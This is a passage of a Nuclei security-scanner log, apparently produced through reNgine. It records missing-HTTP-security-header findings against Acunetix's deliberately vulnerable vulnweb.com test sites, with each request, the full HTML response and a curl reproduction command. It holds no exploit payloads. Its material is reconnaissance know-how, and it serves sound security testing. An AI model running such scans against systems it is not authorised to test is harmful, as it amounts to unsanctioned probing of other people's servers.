href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9084')\\\" style=\\\"color:Black\\\" title=\\\"November 14\\\"\\u003e14\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9085')\\\" style=\\\"color:Black\\\" title=\\\"November 15\\\"\\u003e15\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9086')\\\" style=\\\"color:Black\\\" title=\\\"November 16\\\"\\u003e16\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9087')\\\" style=\\\"color:Black\\\" title=\\\"November 17\\\"\\u003e17\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9088')\\\" style=\\\"color:Black\\\" title=\\\"November 18\\\"\\u003e18\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9089')\\\" style=\\\"color:Black\\\" title=\\\"November 19\\\"\\u003e19\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9090')\\\" style=\\\"color:Black\\\" title=\\\"November 20\\\"\\u003e20\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9091')\\\" style=\\\"color:Black\\\" title=\\\"November 21\\\"\\u003e21\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9092')\\\" style=\\\"color:Black\\\" title=\\\"November 22\\\"\\u003e22\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9093')\\\" style=\\\"color:Black\\\" title=\\\"November 23\\\"\\u003e23\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9094')\\\" style=\\\"color:Black\\\" title=\\\"November 24\\\"\\u003e24\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9095')\\\" style=\\\"color:Black\\\" title=\\\"November 25\\\"\\u003e25\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9096')\\\" style=\\\"color:Black\\\" title=\\\"November 26\\\"\\u003e26\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9097')\\\" style=\\\"color:Black\\\" title=\\\"November 27\\\"\\u003e27\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9098')\\\" style=\\\"color:Black\\\" title=\\\"November 28\\\"\\u003e28\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9099')\\\" style=\\\"color:Black\\\" title=\\\"November 29\\\"\\u003e29\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9100')\\\" style=\\\"color:Black\\\" title=\\\"November 30\\\"\\u003e30\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9101')\\\" style=\\\"color:Black\\\" title=\\\"December 01\\\"\\u003e1\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9102')\\\" style=\\\"color:Black\\\" title=\\\"December 02\\\"\\u003e2\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9103')\\\" style=\\\"color:Black\\\" title=\\\"December 03\\\"\\u003e3\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9104')\\\" style=\\\"color:Black\\\" title=\\\"December 04\\\"\\u003e4\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9105')\\\" style=\\\"color:Black\\\" title=\\\"December 05\\\"\\u003e5\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9106')\\\" style=\\\"color:Black\\\" title=\\\"December 06\\\"\\u003e6\\u003c/a\\u003e\\u003c/td\\u003e\\u003ctd align=\\\"center\\\" style=\\\"width:14%;\\\"\\u003e\\u003ca href=\\\"javascript:__doPostBack('RightPanel1$Calendar','9107')\\\" style=\\\"color:Black\\\" title=\\\"December 07\\\"\\u003e7\\u003c/a\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\u003c/table\\u003e\\u003cBR\\u003e\\r\\n\\u003ca href=\\\"rssFeed.aspx\\\"\\u003eGet RSS feed\\u003c/a\\u003e\\r\\n\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\t\\u003cTR\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003cTD colSpan=\\\"2\\\"\\u003e\\r\\n\\t\\t\\t\\t\\t\\u003c/TD\\u003e\\r\\n\\t\\t\\t\\t\\u003c/TR\\u003e\\r\\n\\t\\t\\t\\u003c/TABLE\\u003e\\r\\n\\t\\t\\u003c/form\\u003e\\r\\n\\t\\u003c/body\\u003e\\r\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\t\\u003cp style=\\\"padding-left:5%;padding-right:5%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.\\u003c/p\\u003e\\r\\n\\t\\u003c/div\\u003e\\r\\n\\u003c/HTML\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:59.312335876Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com/T\",\"path\":\"/T\",\"matched-at\":\"http://testasp.vulnweb.com/T/\",\"request\":\"GET /T HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 403 Forbidden\\r\\nConnection: close\\r\\nContent-Length: 1233\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:46 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\u003c!DOCTYPE html PUBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\\\"\\u003e\\r\\n\\u003chtml xmlns=\\\"http://www.w3.org/1999/xhtml\\\"\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"/\\u003e\\r\\n\\u003ctitle\\u003e403 - Forbidden: Access is denied.\\u003c/title\\u003e\\r\\n\\u003cstyle type=\\\"text/css\\\"\\u003e\\r\\n\\u003c!--\\r\\nbody{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}\\r\\nfieldset{padding:0 15px 10px 15px;} \\r\\nh1{font-size:2.4em;margin:0;color:#FFF;}\\r\\nh2{font-size:1.7em;margin:0;color:#CC0000;} \\r\\nh3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} \\r\\n#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:\\\"trebuchet MS\\\", Verdana, sans-serif;color:#FFF;\\r\\nbackground-color:#555555;}\\r\\n#content{margin:0 0 0 2%;position:relative;}\\r\\n.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}\\r\\n--\\u003e\\r\\n\\u003c/style\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003cdiv id=\\\"header\\\"\\u003e\\u003ch1\\u003eServer Error\\u003c/h1\\u003e\\u003c/div\\u003e\\r\\n\\u003cdiv id=\\\"content\\\"\\u003e\\r\\n \\u003cdiv class=\\\"content-container\\\"\\u003e\\u003cfieldset\\u003e\\r\\n \\u003ch2\\u003e403 - Forbidden: Access is denied.\\u003c/h2\\u003e\\r\\n \\u003ch3\\u003eYou do not have permission to view this directory or page using the credentials that you supplied.\\u003c/h3\\u003e\\r\\n \\u003c/fieldset\\u003e\\u003c/div\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:59.312415053Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/604.1' 'http://testasp.vulnweb.com/T'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"referrer-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/comment\",\"path\":\"/comment\",\"matched-at\":\"http://testhtml5.vulnweb.com/comment\",\"request\":\"GET /comment HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Sorry, but commenting is currently disabled! \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.575445522Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' 'http://testhtml5.vulnweb.com/comment'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"path\":\"/static/app/libs/sessvars.js:202\",\"matched-at\":\"http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202\",\"request\":\"GET /static/app/libs/sessvars.js:202 HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 Not Found\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ccenter\\u003e\\u003ch1\\u003e404 Not Found\\u003c/h1\\u003e\\u003c/center\\u003e\\r\\n\\u003chr\\u003e\\u003ccenter\\u003enginx/1.19.0\\u003c/center\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.706754916Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_16) AppleWebKit/561.9 (KHTML, like Gecko) Version/11.7.81 Safari/561.9' 'http://testhtml5.vulnweb.com/static/app/libs/sessvars.js:202'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-embedder-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/admin\",\"path\":\"/admin\",\"matched-at\":\"http://testhtml5.vulnweb.com/admin\",\"request\":\"GET /admin HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 308 PERMANENT REDIRECT\\r\\nConnection: close\\r\\nContent-Length: 253\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nLocation: http://localhost/admin/\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003eRedirecting...\\u003c/title\\u003e\\n\\u003ch1\\u003eRedirecting...\\u003c/h1\\u003e\\n\\u003cp\\u003eYou should be redirected automatically to target URL: \\u003ca href=\\\"http://localhost/admin/\\\"\\u003ehttp://localhost/admin/\\u003c/a\\u003e. If not click the link.\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.706797182Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:123.0) Gecko/20100101 Firefox/123.0' 'http://testhtml5.vulnweb.com/admin'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/.carousel\",\"path\":\"/.carousel\",\"matched-at\":\"http://testhtml5.vulnweb.com/.carousel\",\"request\":\"GET /.carousel HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 404 NOT FOUND\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 3.2 Final//EN\\\"\\u003e\\n\\u003ctitle\\u003e404 Not Found\\u003c/title\\u003e\\n\\u003ch1\\u003eNot Found\\u003c/h1\\u003e\\n\\u003cp\\u003eThe requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.\\u003c/p\\u003e\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:59.706809269Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36 Edg/88.0.705.50' 'http://testhtml5.vulnweb.com/.carousel'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security 